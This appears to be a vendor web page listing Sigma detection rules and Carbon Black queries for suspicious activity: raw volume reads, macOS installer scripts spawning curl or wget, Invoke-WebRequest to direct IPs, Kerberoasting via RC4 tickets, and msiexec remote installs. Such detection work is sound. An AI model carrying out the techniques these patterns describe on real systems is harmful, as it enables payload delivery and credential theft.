status test author frack113 ATT&CK sub-technique id 70ad982f-67c8-40e0-a955-b920c2fa05cb

carbon_black query

ScriptBlockText:New\-Object* ScriptBlockText:IO.FileStream* ScriptBlockText:\\\\.\\*

view Sigma YAML

title: Suspicious IO.FileStream
id: 70ad982f-67c8-40e0-a955-b920c2fa05cb
status: test
description: Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md
author: frack113
date: 2022-01-09
modified: 2022-03-05
tags:
    - attack.stealth
    - attack.t1070.003
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - New-Object
            - IO.FileStream
            - '\\\\.\\'
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Installer Package Child Process

Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters

status test author Sohan G (D4rkCiph3r) ATT&CK sub-technique id e0cfaecd-602d-41af-988d-f6ccebb2af26

carbon_black query

(ParentImage:\/package_script_service OR ParentImage:\/installer) (Image:\/sh OR Image:\/bash OR Image:\/dash OR Image:\/python OR Image:\/ruby OR Image:\/perl OR Image:\/php OR Image:\/javascript OR Image:\/osascript OR Image:\/tclsh OR Image:\/curl OR Image:\/wget) (CommandLine:preinstall* OR CommandLine:postinstall*)

view Sigma YAML

title: Suspicious Installer Package Child Process
id: e0cfaecd-602d-41af-988d-f6ccebb2af26
status: test
description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
references:
    - https://redcanary.com/blog/clipping-silver-sparrows-wings/
    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml
author: Sohan G (D4rkCiph3r)
date: 2023-02-18
tags:
    - attack.t1059
    - attack.t1059.007
    - attack.t1071
    - attack.t1071.001
    - attack.execution
    - attack.command-and-control
logsource:
    category: process_creation
    product: macos
detection:
    selection_installer:
        ParentImage|endswith:
            - '/package_script_service'
            - '/installer'
        Image|endswith:
            - '/sh'
            - '/bash'
            - '/dash'
            - '/python'
            - '/ruby'
            - '/perl'
            - '/php'
            - '/javascript'
            - '/osascript'
            - '/tclsh'
            - '/curl'
            - '/wget'
        CommandLine|contains:
            - 'preinstall'
            - 'postinstall'
    condition: selection_installer
falsepositives:
    - Legitimate software uses the scripts (preinstall, postinstall)
level: medium

Convert to SIEM query

medium Moderate High FP

Suspicious Invoke-Item From Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

status test author frack113 ATT&CK sub-technique id 902cedee-0398-4e3a-8183-6f3a89773a96

carbon_black query

ScriptBlockText:Mount\-DiskImage\ * ScriptBlockText:\-ImagePath\ * ScriptBlockText:Get\-Volume* ScriptBlockText:.DriveLetter* ScriptBlockText:invoke\-item\ * ScriptBlockText:\)\:\\*

view Sigma YAML

title: Suspicious Invoke-Item From Mount-DiskImage
id: 902cedee-0398-4e3a-8183-6f3a89773a96
status: test
description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso
    - https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps
author: frack113
date: 2022-02-01
tags:
    - attack.defense-impairment
    - attack.t1553.005
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'Mount-DiskImage '
            - '-ImagePath '
            - Get-Volume
            - '.DriveLetter'
            - 'invoke-item '
            - '):\'
    condition: selection
falsepositives:
    - Legitimate PowerShell scripts
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious Invoke-WebRequest Execution With DirectIP

Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 1edff897-9146-48d2-9066-52e8d8f80a2f

carbon_black query

((Image:\\powershell_ise.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:powershell_ise.EXE OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) (CommandLine:curl\ * OR CommandLine:Invoke\-RestMethod* OR CommandLine:Invoke\-WebRequest* OR CommandLine:\ irm\ * OR CommandLine:iwr\ * OR CommandLine:wget\ *) (CommandLine:\:\/\/1* OR CommandLine:\:\/\/2* OR CommandLine:\:\/\/3* OR CommandLine:\:\/\/4* OR CommandLine:\:\/\/5* OR CommandLine:\:\/\/6* OR CommandLine:\:\/\/7* OR CommandLine:\:\/\/8* OR CommandLine:\:\/\/9*)

view Sigma YAML

title: Suspicious Invoke-WebRequest Execution With DirectIP
id: 1edff897-9146-48d2-9066-52e8d8f80a2f
status: test
description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
references:
    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-21
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'powershell_ise.EXE'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_commands:
        CommandLine|contains:
            # These are all aliases of Invoke-WebRequest
            - 'curl '
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
            - 'iwr '
            - 'wget '
    selection_ip:
        # In case of FP with local IPs add additional filters
        CommandLine|contains:
            - '://1'
            - '://2'
            - '://3'
            - '://4'
            - '://5'
            - '://6'
            - '://7'
            - '://8'
            - '://9'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Low FP

Suspicious Kerberos RC4 Ticket Encryption

Detects service ticket requests using RC4 encryption type

status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 496a0e47-0a33-4dca-b009-9e6ca3591f39

carbon_black query

(EventID:4769 TicketOptions:0x40810000 TicketEncryptionType:0x17) (-ServiceName:$)

view Sigma YAML

title: Suspicious Kerberos RC4 Ticket Encryption
id: 496a0e47-0a33-4dca-b009-9e6ca3591f39
status: test
description: Detects service ticket requests using RC4 encryption type
references:
    - https://adsecurity.org/?p=3458
    - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity
author: Florian Roth (Nextron Systems)
date: 2017-02-06
modified: 2022-06-19
tags:
    - attack.credential-access
    - attack.t1558.003
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4769
        TicketOptions: '0x40810000'
        TicketEncryptionType: '0x17'
    reduction:
        ServiceName|endswith: '$'
    condition: selection and not reduction
falsepositives:
    - Service accounts used on legacy systems (e.g. NetApp)
    - Windows Domains with DFL 2003 and legacy systems
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious Keyboard Layout Load

Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only

status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id 34aa0252-6039-40ff-951f-939fd6ce47d8

carbon_black query

(TargetObject:\\Keyboard\ Layout\\Preload\\* OR TargetObject:\\Keyboard\ Layout\\Substitutes\\*) (Details:00000429* OR Details:00050429* OR Details:0000042a*)

view Sigma YAML

title: Suspicious Keyboard Layout Load
id: 34aa0252-6039-40ff-951f-939fd6ce47d8
status: test
description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
references:
    - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index
    - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
author: Florian Roth (Nextron Systems)
date: 2019-10-12
modified: 2023-08-17
tags:
    - attack.resource-development
    - attack.t1588.002
logsource:
    category: registry_set
    product: windows
    definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'
detection:
    selection_registry:
        TargetObject|contains:
            - '\Keyboard Layout\Preload\'
            - '\Keyboard Layout\Substitutes\'
        Details|contains:
            - 00000429  # Persian (Iran)
            - 00050429  # Persian (Iran)
            - 0000042a  # Vietnamese
    condition: selection_registry
falsepositives:
    - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious LNK Double Extension File Created

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

status test author Nasreddine Bencherchali (Nextron Systems), frack113 ATT&CK sub-technique id 3215aa19-f060-4332-86d5-5602511f3ca8

carbon_black query

(TargetFilename:.lnk (TargetFilename:.doc.* OR TargetFilename:.docx.* OR TargetFilename:.jpg.* OR TargetFilename:.pdf.* OR TargetFilename:.ppt.* OR TargetFilename:.pptx.* OR TargetFilename:.xls.* OR TargetFilename:.xlsx.*)) (-TargetFilename:\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*) (-(((Image:\\excel.exe OR Image:\\powerpnt.exe OR Image:\\winword.exe) TargetFilename:\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*) OR (Image:\\excel.exe TargetFilename:\\AppData\\Roaming\\Microsoft\\Excel*) OR (Image:\\powerpnt.exe TargetFilename:\\AppData\\Roaming\\Microsoft\\PowerPoint*) OR (Image:\\winword.exe TargetFilename:\\AppData\\Roaming\\Microsoft\\Word*)))

view Sigma YAML

title: Suspicious LNK Double Extension File Created
id: 3215aa19-f060-4332-86d5-5602511f3ca8
related:
    - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e
      type: derived
status: test
description: |
    Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
references:
    - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/
    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
    - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles
    - https://twitter.com/malwrhunterteam/status/1235135745611960321
    - https://twitter.com/luc4m/status/1073181154126254080
author: Nasreddine Bencherchali (Nextron Systems), frack113
date: 2022-11-07
modified: 2023-10-18
tags:
    - attack.stealth
    - attack.t1036.007
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '.lnk'
        TargetFilename|contains:
            - '.doc.'
            - '.docx.'
            - '.jpg.'
            - '.pdf.'
            - '.ppt.'
            - '.pptx.'
            - '.xls.'
            - '.xlsx.'
    filter_main_recent:
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Windows\Recent\'
    filter_optional_office_recent:
        Image|endswith:
            # Note: Some additional office application might need to be added
            - '\excel.exe'
            - '\powerpnt.exe'
            - '\winword.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Office\Recent\'
    filter_optional_office_excel:
        Image|endswith: '\excel.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Excel'
    filter_optional_office_powerpoint:
        Image|endswith: '\powerpnt.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\PowerPoint'
    filter_optional_office_word:
        Image|endswith: '\winword.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Word'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Some tuning is required for other general purpose directories of third party apps
level: medium
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml

Convert to SIEM query

medium Moderate Medium FP

Suspicious Log Entries

Detects suspicious log entries in Linux log files

status test author Florian Roth (Nextron Systems) ATT&CK tactic-only id f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1

carbon_black query

"entered\ promiscuous\ mode" OR "Deactivating\ service" OR "Oversized\ packet\ received\ from" OR "imuxsock\ begins\ to\ drop\ messages"

view Sigma YAML

title: Suspicious Log Entries
id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1
status: test
description: Detects suspicious log entries in Linux log files
references:
    - https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml
author: Florian Roth (Nextron Systems)
date: 2017-03-25
modified: 2021-11-27
tags:
    - attack.impact
logsource:
    product: linux
detection:
    keywords:
        # Generic suspicious log lines
        - 'entered promiscuous mode'
        # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml
        - 'Deactivating service'
        - 'Oversized packet received from'
        - 'imuxsock begins to drop messages'
    condition: keywords
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Low FP

Suspicious Login Activity Classified By Google

Detects Google Workspace login activity that's classified as suspicious by Google.

status experimental author Tom Kluter ATT&CK sub-technique id 38360161-76c4-4283-842e-efcf997dafc8

carbon_black query

"protoPayload.Servicename":login.googleapis.com ("protoPayload.metadata.event.eventName":suspicious_login_less_secure_app OR "protoPayload.metadata.event.eventName":suspicious_login OR "protoPayload.metadata.event.eventName":suspicious_programmatic_login)

view Sigma YAML

title: Suspicious Login Activity Classified By Google
id: 38360161-76c4-4283-842e-efcf997dafc8
status: experimental
description: Detects Google Workspace login activity that's classified as suspicious by Google.
references:
    - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging
    - https://cloud.google.com/logging/docs/audit/understanding-audit-logs
    - https://developers.google.com/workspace/admin/reports/v1/appendix/activity/login#suspicious_login
    - https://developers.google.com/workspace/admin/reports/v1/appendix/activity/login#suspicious_login_less_secure_app
    - https://developers.google.com/workspace/admin/reports/v1/appendix/activity/login#suspicious_programmatic_login
author: Tom Kluter
date: 2026-04-28
tags:
    - attack.initial-access
    - attack.privilege-escalation
    - attack.persistence
    - attack.stealth
    - attack.t1078.004
logsource:
    product: gcp
    service: google_workspace.login
detection:
    selection:
        protoPayload.Servicename: 'login.googleapis.com'
        protoPayload.metadata.event.eventName:
            - 'suspicious_login_less_secure_app'
            - 'suspicious_login'
            - 'suspicious_programmatic_login'
    condition: selection
falsepositives:
    - Legitimate logins
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious MacOS Firmware Activity

Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.

status test author Austin Songer @austinsonger ATT&CK tactic-only id 7ed2c9f7-c59d-4c82-a7e2-f859aa676099

carbon_black query

Image:\/usr\/sbin\/firmwarepasswd (CommandLine:setpasswd* OR CommandLine:full* OR CommandLine:delete* OR CommandLine:check*)

view Sigma YAML

title: Suspicious MacOS Firmware Activity
id: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099
status: test
description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.
references:
    - https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml
    - https://www.manpagez.com/man/8/firmwarepasswd/
    - https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web
author: Austin Songer @austinsonger
date: 2021-09-30
modified: 2022-10-09
tags:
    - attack.impact
logsource:
    category: process_creation
    product: macos
detection:
    selection1:
        Image: '/usr/sbin/firmwarepasswd'
        CommandLine|contains:
            - 'setpasswd'
            - 'full'
            - 'delete'
            - 'check'
    condition: selection1
falsepositives:
    - Legitimate administration activities
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious Msbuild Execution By Uncommon Parent Process

Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process

status test author frack113 ATT&CK tactic-only id 33be4333-2c6b-44f4-ae28-102cdbde0a31

carbon_black query

(Image:\\MSBuild.exe OR OriginalFileName:MSBuild.exe) (-(ParentImage:\\devenv.exe OR ParentImage:\\cmd.exe OR ParentImage:\\msbuild.exe OR ParentImage:\\python.exe OR ParentImage:\\explorer.exe OR ParentImage:\\nuget.exe))

view Sigma YAML

title: Suspicious Msbuild Execution By Uncommon Parent Process
id: 33be4333-2c6b-44f4-ae28-102cdbde0a31
status: test
description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process
references:
    - https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/
    - https://www.echotrail.io/insights/search/msbuild.exe
author: frack113
date: 2022-11-17
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\MSBuild.exe'
        - OriginalFileName: 'MSBuild.exe'
    filter_parent:
        ParentImage|endswith:
            - '\devenv.exe'
            - '\cmd.exe'
            - '\msbuild.exe'
            - '\python.exe'
            - '\explorer.exe'
            - '\nuget.exe'
    condition: selection and not filter_parent
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate Medium FP

Suspicious MsiExec Embedding Parent

Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads

status test author frack113 ATT&CK sub-technique id 4a2a2c3e-209f-4d01-b513-4155a540b469

carbon_black query

((Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\cmd.exe) (ParentCommandLine:MsiExec.exe* ParentCommandLine:\-Embedding\ *)) (-((Image:\:\\Windows\\System32\\cmd.exe CommandLine:C\:\\Program\ Files\\SplunkUniversalForwarder\\bin\\*) OR (CommandLine:\\DismFoDInstall.cmd* OR (ParentCommandLine:\\MsiExec.exe\ \-Embedding\ * ParentCommandLine:Global\\MSI0000*))))

view Sigma YAML

title: Suspicious MsiExec Embedding Parent
id: 4a2a2c3e-209f-4d01-b513-4155a540b469
status: test
description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
author: frack113
date: 2022-04-16
modified: 2022-07-14
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        ParentCommandLine|contains|all:
            - 'MsiExec.exe'
            - '-Embedding '
    filter_splunk_ufw:
        Image|endswith: ':\Windows\System32\cmd.exe'
        CommandLine|contains: 'C:\Program Files\SplunkUniversalForwarder\bin\'
    filter_vs:
        - CommandLine|contains: '\DismFoDInstall.cmd'
        - ParentCommandLine|contains|all:
              - '\MsiExec.exe -Embedding '
              - 'Global\MSI0000'
    condition: selection and not 1 of filter*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious Msiexec Execute Arbitrary DLL

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

status test author frack113 ATT&CK sub-technique id 6f4191bb-912b-48a8-9ce7-682769541e6d

carbon_black query

(Image:\\msiexec.exe (CommandLine:\ \-Y* OR CommandLine:\ \/Y* OR CommandLine:\ –Y* OR CommandLine:\ —Y* OR CommandLine:\ ―Y*)) (-(CommandLine:\\MsiExec.exe\"\ \/Y\ \"C\:\\Program\ Files\\* OR CommandLine:\\MsiExec.exe\"\ \/Y\ \"C\:\\Program\ Files\ \(x86\)\\* OR CommandLine:\\MsiExec.exe\"\ \/Y\ \"C\:\\Windows\\System32\\* OR CommandLine:\\MsiExec.exe\"\ \/Y\ \"C\:\\Windows\\SysWOW64\\*))

view Sigma YAML

title: Suspicious Msiexec Execute Arbitrary DLL
id: 6f4191bb-912b-48a8-9ce7-682769541e6d
status: test
description: |
    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
    - https://twitter.com/_st0pp3r_/status/1583914515996897281
author: frack113
date: 2022-01-16
modified: 2026-01-09
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msiexec.exe'
        CommandLine|contains|windash: ' /Y'
    filter_main_legit_path:
        CommandLine|contains:
            - '\MsiExec.exe" /Y "C:\Program Files\'
            - '\MsiExec.exe" /Y "C:\Program Files (x86)\'
            - '\MsiExec.exe" /Y "C:\Windows\System32\'
            - '\MsiExec.exe" /Y "C:\Windows\SysWOW64\'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Legitimate script
level: medium

Convert to SIEM query

medium Strong Medium FP

Suspicious Msiexec Quiet Install From Remote Location

Detects usage of Msiexec.exe to install packages hosted remotely quietly

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id 8150732a-0c9d-4a99-82b9-9efb9b90c40c

carbon_black query

((Image:\\msiexec.exe OR OriginalFileName:msiexec.exe) (CommandLine:\-i* OR CommandLine:\/i* OR CommandLine:–i* OR CommandLine:—i* OR CommandLine:―i* OR CommandLine:\-package* OR CommandLine:\/package* OR CommandLine:–package* OR CommandLine:—package* OR CommandLine:―package* OR CommandLine:\-a* OR CommandLine:\/a* OR CommandLine:–a* OR CommandLine:—a* OR CommandLine:―a* OR CommandLine:\-j* OR CommandLine:\/j* OR CommandLine:–j* OR CommandLine:—j* OR CommandLine:―j*) (CommandLine:\-q* OR CommandLine:\/q* OR CommandLine:–q* OR CommandLine:—q* OR CommandLine:―q*) (CommandLine:http* OR CommandLine:\\\\*)) (-(CommandLine:\\AppData\\Local\\Temp\\OpenOffice* CommandLine:Installation\ Files\\openoffice*))

view Sigma YAML

title: Suspicious Msiexec Quiet Install From Remote Location
id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c
related:
    - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f
      type: similar
status: test
description: Detects usage of Msiexec.exe to install packages hosted remotely quietly
references:
    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-28
modified: 2025-10-07
tags:
    - attack.stealth
    - attack.t1218.007
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: 'msiexec.exe'
    selection_cli:
        # Note that there is no space before and after the arguments because it's possible to write a commandline as such
        # Example: msiexec -q/i [MSI Package]
        CommandLine|contains|windash:
            - '-i'
            - '-package'
            - '-a'
            - '-j'
    selection_quiet:
        CommandLine|contains|windash: '-q'
    selection_remote:
        CommandLine|contains:
            - 'http'
            - '\\\\'
    filter_optional_openoffice:
        CommandLine|contains|all:
            - '\AppData\Local\Temp\OpenOffice'
            - 'Installation Files\openoffice'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

VMware Carbon Black

Detection rules